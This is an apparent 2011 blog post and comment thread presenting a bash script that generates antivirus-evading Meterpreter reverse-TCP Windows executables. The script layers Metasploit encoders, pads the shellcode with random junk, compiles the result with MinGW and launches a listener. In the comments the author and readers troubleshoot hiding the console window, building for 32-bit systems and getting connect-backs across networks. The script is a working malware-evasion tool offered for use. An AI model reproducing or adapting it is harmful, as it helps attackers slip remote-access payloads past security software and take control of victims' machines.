Bypassing Antivirus somehow…

There is not much to be said about this issue, as there are so many ways to accomplish this. I wanted to try and give it a shot and see how far I will get in creating something what others call FUD (Fully Undetectable). As you can see from below results the file still gets detected by Microsoft and Kaspersky AV but I’ve intentionally left out the important part from the shell script to make it fully undetectable. I was using some simple shellscript-fu and some really basic knowledge of C language. The resulting executable will be different every time you run this script.

Update 11.11.2011 – As expected Virustotal starts detecting this stuff ;), just change the source code a bit (hint hint) and you get a clean executable againmay the source be with you.

What we need is a decent Linux distro and a mingw32  and Metasploit of course. Im using a Debian based system in this example, so hopefully the shellscript below will work. As always please study it first to see what it does – don’t be a script kiddie.  Please remember to save this into the Metasploit root folder and make it executable.

       REVERSE_TCP Payload generator

 #!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
#Lets check for MinGW32
if  builtin type -p i686-w64-mingw32-gcc > /dev/null ; then 

echo "Here is a network device list available on yor machine"
else echo "Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools"
echo "exiting.....";  exit
fi
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 

i686-w64-mingw32-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E

What happens here is this :

  1. We choose a network interface according to the /proc/net/dev  $interface
  2. Next we need to select a port number for our meterpreter to listen on   $port
  3. Random seed to add some junk to the resulting C code source file   $seed
  4. Finally with how many cycles we encode our shellcode   $enumber
  5. Next we create a raw shellcode with msfencode and our variables
  6. Do some sed, and format the raw shellcode into C stuff
  7. Add some bogus functions and random data array
  8. Compile the C source with mingw32 to get Win32 PE executable
  9. Rename the EXE to some random filename ex. 32423.exe
  10. Strip the binary from Debug info

Here are some screenshots from Antivirus scanner engines I’ve taken to see how well the resulting executable avoids individual AVs.

The most obvious step to create a fully undetectable Meterpreter payload Executable is left out from the script intentionally.

About these ads
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

41 Responses to Bypassing Antivirus somehow…

  1. Pingback: Coresec.org – Information Security Blog » FUD Payload Generator for Backtrack

  2. Pingback: FUD Payload Generator for Backtrack 5 « AfterShell.com – IT Security Blog

  3. Pingback: So you have antivirus and you think you are protected.. pfft….. think again… « Daniel Weis's I.T Security Blog

  4. hidden says:

    Your hint with the bit I understood, but how to apply your hint. :-?

  5. Janus says:

    Hi Astr0baby,

    Nice work. I’m thoroughly enjoying learning from your awesome tutorial.
    I finally got a FUD meterpreter compiled and it connects back fine from my test machine (win 7 EN), but when I try to migrate the process dies and I lose the session. Also noticed that a DOS box pops up and has to be manually closed which isn’t very stealthy. Likely that I broke something messing around with your code. I used the i686-w64-mingw32-gcc compiler instead. Didn’t get any errors although meterpreter seems buggy now. I just tried compiling another one and it dies while receiving the stage from the listener I have set up on the internet. I imagine I’m breaking something with your script but I’m not sure what. I think it’s interesting that both FUD samples used the same exact script yet one seems more broken than the other.
    Any ideas or hints?

    Thanks,
    Janus

    • astr0baby says:

      Hi Janus,

      if you want a stealthy execution of the payload you need to change the Generator C code a little.
      In C++ there are functions to make the command line window invisible using various methods. For example you can use WinAPI ShowWindow( hwnd, SW_HIDE ); as one methods, but then you need to use proper headers in the generator code. I’ve omitted these function on purpose so it would not be abused in a malicious way. As for the broken executables, you can try and debug them to see what causes the crashes I honestly cannot say (maybe its mingw related)

  6. xenocide says:

    Could you explain the $RANDOM variable please. Thanks

    • astr0baby says:

      $RANDOM is an internal Bash function (not a constant) that returns a pseudorandom [1] integer in the range 0 – 32767. It should not be used to generate an encryption key.

  7. The Moorish says:

    is it possible to use this method to make Metasploit’s ms08_067_netapi FUD?

    • astr0baby says:

      Hi,
      Im afraid you would have to rewrite the ms08_067_netapi module to include a “custom exe” in the advanced options. This option is available in the psexec module for example (show advanced)

  8. gr0w1 says:

    Hi astrobaby, i have tested the exe output of the script, work properly with windows 7 but in windows xp won’t run. i have modified your script to insert an external IP address, so nothing of vital for script…any idea???

  9. gr0w1 says:

    Hi, i have found my problem…the exe output work only with 64-bit system, i tried with windows xp,windows 7 32-bit and won’t run…you have some ideas to change the script and make it work even with the 32-bit?

    • astr0baby says:

      Hi, just make sure you use right compiler (for 32bit or 64bit binary executables) And I would suggest checking the compiler string in the script as there might be some problems. Good luck ;)

  10. ChunKill says:

    Is there any way to get an EXE file WinRar (SFX) and encrypt so that people can not extract file draw? It has also undetectable as it gets:
    Example: Themida (obsolete). I await tips – Thanks

    • astr0baby says:

      There are many ways to get a binary undetectable by modern AVs. This example was just a little exercise for making the Meterpreter executables undetectable when run for example via psexec module. A good start is probably learning how to do simple things in C++ and then write your own source code and insert your shellcode into it. Many advanced AVs flag packed executables as dangerous anyways. In my opinion the best way is to make a legitimate C++ loader with some bogus functions, hide the shellcode in some clever way and compile the result.

  11. alex says:

    can any please tell me how to make it executable???

  12. alex says:

    can anyone please tell me how to make it executable?….i copied the code and save it as vanish.sh,.but when i run it it says permission denied?,..why?

  13. alex says:

    tnk you master,.those this work on win7?..

  14. alex says:

    please help;
    i have a little bit of trouble running with vanish.sh..
    i already make it executable file,but it says…

    ************************************************************
    Automatic shellcode generator – FOR METASPLOIT
    By Astr0baby 2011
    With some Randomic gravy and sauce to bypass Antivirus
    For Automatic Teensy programming and deployment
    ************************************************************
    Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools
    exiting…..

    im using bt5r3
    i try to download mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools, using this commands:

    sudo apt-get install Mingw-w64-tools
    it says:
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    E: Couldn’t find package Mingw-w64-tools

    am i using the correct command??????….im confused……::((

    could please anyone tell me how to download any of these ???????/

  15. alex says:

    thank you,…:))))

  16. alex says:

    when checking if the file is working wine error comes:

    fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
    fixme:toolhelp:Heap32ListFirst : stub
    wine: Unhandled page fault on read access to 0x00000000 at address 0x9830cc (thread 002f), starting debugger…

  17. alex says:

    tnk u very much u help me alot,…..apprcte it,… :)) !! it woorkss……

  18. alex says:

    tnx for the help….it work,but only inside my network ,.,..i have my netbook and laptop connected into different networks,..then i started my vanish.sh…started listening,…i transferred the file that vanish.sh generated into the win machine,…but no sessions,…..
    i already setup my port forwarding in my router 443 & 80 “followed ur tutorial”…..and visit http://www.portforward.com………..

    any suggestion to make it work over other network??,….

  19. alex says:

    ok,..tnx alot,.. ;)

  20. alex says:

    one more:……
    when executing vanish.sh,..what ip will it set for the payload?,.external ip?
    if not, how to set it………?????????????????????????????????????????????????

  21. alex says:

    in portforwarding,im using linksys E1200,..i also forward port 4444 in my router and open my port using this commands:
    iptables -A INPUT -p tcp -s 192.168.1.0/24 –dport 4444 -j ACCEPT

  22. back1door@ymail.com says:

    help me … why vanish .sh is not working..?????
    # cd /pentest/exploits/framework2
    root@bt:/pentest/exploits/framework2# ./vanish.sh
    ************************************************************
    Fully Undetectable Metasploit Payload generaor Beta
    Original Concept and Script by Astr0baby
    Stable Version of Script is Edited by Vanish3r
    Video Tutorial by Vanish3r – http://www.securitylabs.in
    Powered by TheHackerNews.com and securitylabs.in
    ************************************************************
    Network Device On your Computer :
    lo:
    wlan0:
    eth0:
    Which Interface to use ? eth0
    What Port Number are we gonna listen to? : 4444
    Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
    How many times you want to encode ? 1-20 : 5
    Current Ip is : 192.168.1.75
    Unknown option: c
    Unknown option: c
    Unknown option: c
    Unknown option: c
    [*] Invalid encoder specified
    [*] Invalid encoder specified
    [*] Invalid encoder specified
    [*] Invalid encoder specified

    Usage: ./msfpayload [var=val]

  23. Blake says:

    My brother recommended I might like this web site.
    He was totally right. This post truly made my day. You can not imagine just how much time I had spent for this information!
    Thanks!

  24. levi says:

    hi ast0baby. thanks for this code… but i tried to run it(saved it as fud.sh, chmod +x it) and it still giving me this

    Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools
    exiting…..

    I’ve already done this to install mingw
    apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

    have i missed something? :)
    please help :)

    thanks
    levi

    • astr0baby says:

      Hi,
      just delete the following code from the script:
      #Lets check for MinGW32
      if builtin type -p i686-w64-mingw32-gcc > /dev/null ; then

      echo “Here is a network device list available on yor machine”
      else echo “Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools”
      echo “exiting…..”; exit
      fi

      • levi says:

        thanks for the reply astr0 but there’s another problem… I really want to try this so… Here is whats wrong

        ./fud2.sh: line 28: cd: ShellCode: Not a directory
        sed: can’t read test.c: No such file or directory

        i tried cd Shellcode myself and same error also. is it the metasploit install which causing this?

        By the way my .sh is inside /opt/metasploit/msf3

        thanks again

      • astr0baby says:

        You need to create a ShellCode directory in the root folder where your metasploit installation is, in your case it is in /opt/metasploit/msf3
        so create a subfolder mkdir /opt/metasploit/msf3/ShellCode, the script does not create is automatically so you need to create it yourself. Good luck.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s